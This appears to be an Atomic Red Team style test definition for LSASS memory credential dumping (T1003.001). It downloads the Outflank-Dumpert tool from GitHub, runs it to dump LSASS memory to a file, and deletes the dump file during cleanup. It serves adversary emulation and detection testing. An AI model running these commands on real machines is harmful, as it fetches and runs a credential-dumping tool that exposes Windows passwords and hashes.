#TechniqueName: OS Credential Dumping: LSASS Memory
#AtomicTestName: Dump LSASS.exe Memory using direct system calls and API unhooking
#Language: cmd

#get_prereq_commands
New-Item -ItemType Directory (Split-Path PathToAtomicsFolder\T1003.001\bin\Outflank-Dumpert.exe) -Force | Out-Null
Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile PathToAtomicsFolder\T1003.001\bin\Outflank-Dumpert.exe


#prereq_commands
if (Test-Path PathToAtomicsFolder\T1003.001\bin\Outflank-Dumpert.exe) {exit 0} else {exit 1}


#commands
PathToAtomicsFolder\T1003.001\bin\Outflank-Dumpert.exe


#cleanup_commands
del C:\windows\temp\dumpert.dmp >nul 2> nul

